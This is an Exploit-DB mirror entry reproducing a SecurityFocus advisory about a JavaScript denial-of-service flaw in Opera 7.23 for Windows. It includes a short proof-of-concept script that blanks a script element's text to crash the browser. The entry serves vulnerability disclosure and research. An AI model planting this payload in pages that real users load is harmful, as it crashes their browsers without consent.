exploit-db-mirror/exploits/multiple/dos/24394.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
463 B
Text

source: https://www.securityfocus.com/bid/10997/info
Opera Web Browser is reported prone to a JavaScript denial-of-service vulnerability.
This vulnerability presents itself when Opera attempts to execute a specific JavaScript command. When executing this command, Opera will reportedly crash.
This issue affects Opera 7.23 for Microsoft Windows; other versions are also likely affected.
<scr1pt>
document.getElementsByTagName("script")[0].text = "";
</scr1pt>